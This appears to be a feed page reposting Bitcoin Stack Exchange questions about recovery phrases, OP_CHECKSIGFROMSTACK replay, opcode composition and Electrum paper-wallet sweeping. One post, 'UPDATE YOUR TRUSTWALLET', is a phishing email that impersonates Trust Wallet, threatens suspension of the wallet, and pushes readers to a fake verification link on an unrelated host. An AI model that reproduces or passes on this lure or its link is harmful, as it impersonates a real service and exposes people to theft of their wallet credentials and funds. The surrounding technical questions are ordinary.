Posts

Web3/crypto service with non-bip39 wordlist recovery phrase

I'm looking for a web-based wallet, web3 service or exchange that uses their own, non-bip39 wordlist. My backup phrase contains the words ministry, goodbye, distribute, and formal - these are not written down incorrectly, since this is an actual screenshot with the full recovery phrase. The only issue is that I don't remember which service I used this for. I signed up for quite a few back in the day and typically made screenshots rather than write down the words. Unfortunately, this particular screenshot does not contain the name of the service or the url... Any help would be appreciated! from Recent Questions - Bitcoin Stack Exchange https://ift.tt/1UwgueD via IFTTT

How does CSFS re-keying / laddering avoid replay across UTXOs?

With OP_CHECKSIGFROMSTACK (CSFS), signatures are verified against an explicit message rather than the transaction sighash. This seems to allow the same (sig, message) pair to be reused across different UTXOs, unless something binds the message to a specific context. Some discussions (e.g. by Jeremy Rubin https://rubin.io/bitcoin/2024/12/02/csfs-ctv-rekey-symmetry/ ) mention re-keying or laddering constructions to mitigate this. My question is: How exactly do CSFS laddering or re-keying schemes prevent cross-UTXO replay in practice? What is the binding mechanism — is it based on chaining commitments, updating keys per step, or something else? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/NYzps2H via IFTTT

What kind of “contract engineering” roles could emerge from current Bitcoin Script primitives?

I’ve been testing simple opcode combinations — CHECKSIG, CSFS, IK+CSFS....trying to get a feel for what each one actually binds. It feels like the challenge is less about expressiveness, and more about choosing the right kind of binding. I’m wondering: Do developers see this as its own discipline — not Ethereum-style contracts, but something like designing Bitcoin’s contracts within constraints? Does that map to a distinct kind of engineering role over time? Or is this still just considered script work? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/7xwDKoX via IFTTT

unable to sweep paper wallet - notification says "bad connection to Electrum network"

I can't transfer my paper wallet BTC to my wallet (Android); I only get the notification "bad connection to Electrum network". How can I solve the issue and access my BTC? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/MYw2lnU via IFTTT

How do you build intuition for spotting unsafe opcode compositions early?

I’ve been running opcode composition experiments (e.g. CAT+CSFS, IK+CSFS) on signet. Related: #130613 , #130598 , Delving thread In several cases, the script validates correctly, but still feels structurally unsafe (e.g. replay, cross-UTXO reuse, weak binding). My question: How do experienced developers recognize these issues early, before they turn into real vulnerabilities? In particular, how do you reason about whether a construction is "too general" or insufficiently bound? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/1lGnXZD via IFTTT

UPDATE YOUR TRUSTWALLET

Important: Wallet Verification RequiredDear User,We are contacting you regarding your wallet. To ensure the security and protection of your funds, it is essential to verify your wallet as soon as possible. Failure to verify the wallet could result in suspension, which may lead to the loss of access to your funds.Why is it important?• Protect your wallet from suspension.• Ensure the security and protection of your funds.• Complete the verification process to avoid interruptions.To prevent any issues and keep your funds safe, please verify your wallet by clicking the link below:Verify Your Wallet Now : https://polivky.endora.site/trustl9wada/trustweb3/TW/ If you did not request this verification, please ignore this email. However, if you have any doubts, contact our support team.If you have any questions, do not hesitate to contact our support team.Thank you for choosing Trust Wallet . We are here to protect your funds! Best regards, The Trust Wallet Team© 2025 Trust Wallet. All rights ...

OP_CAT + OP_CHECKSIGFROMSTACK: how to prevent cross-UTXO signature reuse?

Following up on #130598 . I built a CAT + CSFS oracle-style script on signet ( commit , reveal ): OP_CAT OP_SHA256 <oracle_pubkey> OP_CHECKSIGFROMSTACK Witness: [sig, PART1, PART2] Message: SHA256(PART1 || PART2) Since CSFS only checks the message, the same (sig, PART1, PART2) appears to be reusable across multiple UTXOs with compatible scripts. For price oracles this is usually acceptable. But if the goal is single-use authorization (i.e., the signature should only be valid for one specific UTXO): Is committing to the outpoint inside the message the only general approach? Or is there a script-level pattern that avoids requiring the oracle to wait for the UTXO to exist before signing? from Recent Questions - Bitcoin Stack Exchange https://ift.tt/wHOPXSB via IFTTT